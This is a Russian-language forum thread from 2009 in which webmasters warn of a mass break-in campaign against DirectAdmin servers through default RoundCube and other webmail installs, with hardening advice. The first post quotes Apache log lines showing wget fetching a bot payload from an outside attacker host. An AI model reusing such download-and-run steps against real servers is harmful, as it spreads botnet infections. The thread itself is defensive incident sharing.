Криптопохуист
С нами с 05.04.03
Сообщения: 17158
Рейтинг: 6019
|
Добавлено: 12/02/09 в 16:48 |
В общем ребята подошли к делу серъезно. Ломают все что плохо стоит.
В особом списке - серваки с DirectAdmin.
DirectAdmin по дефолту ставит в /var/www/html следующий софт:
RoundCube
phpmyadmin
Squirrelmail
webmail
И делает алиасы на все домены и дефолтные хосты!!!! Софт абсолютно открытый.
Если вам дорого ваш сервер, при установке директадмина убивайте это гавно.
Если у вас стоит директадмин, зайдите посмотрите в /var/log/httpd/error_log
Признаки взлома:
или такое
Код: | 17:37:09 (66.4 KB/s) - `botn7.txt.1' saved [32362/32362]
........ . 100% 66.3K=0.5ssh: GET: command not found
17:37:09 (66.3 KB/s) - `botn7.txt.2' saved [32362/32362]
sh: GET: command not found
--17:37:11-- http://www.submasters.xpg.com.br/botn7.txt
Resolving submasters.xpg.com.br... 200.149.77.40
Connecting to submasters.xpg.com.br|200.149.77.40|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 32362 (32K) [text/plain]
Saving to: `botn7.txt'
0K .......... .......... .......... . 100% 70.5K=0.4s
17:37:12 (70.5 KB/s) - `botn7.txt' saved [32362/32362]
sh: GET: command not found |
Ломают через /var и /tmp - ставьте на эти партиции nosuid,noexec!
Именно там можно обнаружить ирк-ботов (исполнительная часть ботнета), ремот шеллы и т.п.
Если не удалось повысить привилегии, ставят в crontab юзера апача свой autorun. Смотрите в кронтаб.
Если стоит ядро 2.6.18-53 - пиздец.
http://www.centos.org/modules/newbb/viewtopic.php?topic_id=12639
повышение привилегий и здравствуй RootKit.
ПС. Взломы были так же обнаружены и без директадмина, но с опенсорсным ПО. Взломы носят массовый однотипный характер, обнаружить их можно в общем error_log Апача.
Последний раз редактировалось: Pentarh (12/02/09 в 17:01), всего редактировалось 1 раз
|
|
|
|
www.phpdevs.com
С нами с 24.10.02
Сообщения: 16633
Рейтинг: 16105
|
Добавлено: 12/02/09 в 16:57 |
А через что ломается, через директадмин ?
|
|
Пишу на php/mysql/django за вменяемые деньги.
Обращаться в личку.
|
0
|
|
|
Криптопохуист
С нами с 05.04.03
Сообщения: 17158
Рейтинг: 6019
|
Добавлено: 12/02/09 в 17:04 |
Через опенсорс. Просто в дефолтном директадмине идут опенсорсные
RoundCube
phpmyadmin
Squirrelmail
webmail
Доступные из любого домена.
|
|
|
|
С нами с 02.09.06
Сообщения: 598
Рейтинг: 613
|
Добавлено: 12/02/09 в 19:05 |
RoundCube сносить надо сразу, через него и ломают. Взломов через пхпадмин, сквирел и вебмейл не обнаруживали пока. Проверить следует /var/tmp/, и крон юзера от которого работает апач. Ломают с 30 декабря, проходят по всем айпишкам датацентров.
|
|
|
|
Криптопохуист
С нами с 05.04.03
Сообщения: 17158
Рейтинг: 6019
|
Добавлено: 12/02/09 в 23:17 |
Замечу опять же, сломали и те места, где не стоял директадмин с этими раундкубами. Но там стояли другие опенсорсы.
Схема проникновения аналогичная. Аналогично, на машину жертвы ставится IRC-bot с кучей другого говнища.
Из чего можно предположить что составляется массивный ботнет.
С другой стороны, я погуглил по названиям файлов эксплойтов - вышел на какой то бразильский сайт с чемпионатом по хаку
И кстати на взломаных машинах вредоносная деятельность отсутствовала. Даже там где умудрялись впарить руткит.
Может этот мега-ботнет можно как то окучить? У меня куча их исходников со списками юзнета и каналами. Вообще похоже на какую то дорогую, спланированную большую кампанию.
|
|
|
|
Криптопохуист
С нами с 05.04.03
Сообщения: 17158
Рейтинг: 6019
|
Добавлено: 12/02/09 в 23:49 |
|
|
|
|
С нами с 05.05.07
Сообщения: 497
Рейтинг: 93
|
Добавлено: 15/02/09 в 22:02 |
Уязвимость баянистая уже. Закрыли этот issue еще в самом начале января.
|
|
|
|
Текстовая реклама в форме ответа Заголовок и до четырех строчек текста Длина текста до 350 символов Купить рекламу в этом месте! |